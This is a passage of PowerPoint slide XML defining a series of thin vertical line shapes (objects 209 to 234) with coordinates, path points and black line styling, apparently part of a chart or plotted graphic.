            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="86360">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="85792"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="object 209"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3546756" y="5561243"/>
            <a:ext cx="1258" cy="171135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="86360">
                <a:moveTo>
                  <a:pt x="0" y="86068"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="86068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="86344"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="object 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576018" y="5548427"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="92806"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="object 211"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575746" y="5548931"/>
            <a:ext cx="1258" cy="183719"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="92710">
                <a:moveTo>
                  <a:pt x="546" y="92281"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="92281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="92557"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="object 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603870" y="5542517"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95788"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="object 213"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3601419" y="5540556"/>
            <a:ext cx="2517" cy="192527"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="97155">
                <a:moveTo>
                  <a:pt x="0" y="96508"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="96784"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="object 214"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3631229" y="5519436"/>
            <a:ext cx="0" cy="213919"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="107950">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="107441"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="object 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630957" y="5518343"/>
            <a:ext cx="1258" cy="215178"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="108585">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="107993"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="object 216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3659136" y="5516252"/>
            <a:ext cx="0" cy="216436"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="109219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="109043"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="object 217"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3658863" y="5516755"/>
            <a:ext cx="2517" cy="216436"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="109219">
                <a:moveTo>
                  <a:pt x="1244" y="108518"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="108518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="108794"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="object 218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686989" y="5497988"/>
            <a:ext cx="0" cy="235311"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="118744">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="118265"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="object 219"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3685922" y="5496893"/>
            <a:ext cx="1258" cy="236570"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="119380">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="118817"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="object 220"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3714894" y="5472805"/>
            <a:ext cx="0" cy="260478"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="131444">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="130967"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="object 221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3714621" y="5473608"/>
            <a:ext cx="2517" cy="259220"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="130810">
                <a:moveTo>
                  <a:pt x="698" y="130291"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="130291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="130567"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="object 222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3742800" y="5448138"/>
            <a:ext cx="0" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="143510">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="143420"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="object 223"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740596" y="5450562"/>
            <a:ext cx="2517" cy="281870"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="142239">
                <a:moveTo>
                  <a:pt x="0" y="141921"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="141921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="142197"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="object 224"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3770654" y="5427772"/>
            <a:ext cx="0" cy="305779"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="154305">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="153692"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="object 225"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3770382" y="5429660"/>
            <a:ext cx="1258" cy="303262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="153035">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="152745"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="object 226"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3798013" y="5396648"/>
            <a:ext cx="0" cy="335979"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="169544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="169404"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="object 227"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3795015" y="5397988"/>
            <a:ext cx="3775" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="168910">
                <a:moveTo>
                  <a:pt x="0" y="168451"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="168451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="168727"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="object 228"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3825918" y="5361246"/>
            <a:ext cx="0" cy="371213"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="187325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="187269"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="object 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3825099" y="5364260"/>
            <a:ext cx="1258" cy="368696"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="186055">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="185748"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="object 230"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3853770" y="5303889"/>
            <a:ext cx="0" cy="429097"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="216535">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="216208"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="object 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3853497" y="5303308"/>
            <a:ext cx="2517" cy="429097"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="216535">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="216505"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="object 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3881678" y="5274395"/>
            <a:ext cx="0" cy="458039"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="231139">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="231091"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="object 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3879763" y="5272431"/>
            <a:ext cx="2517" cy="460556"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="232410">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="232087"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="object 234"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909530" y="5207364"/>
            <a:ext cx="0" cy="525990"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="265430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="264917"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
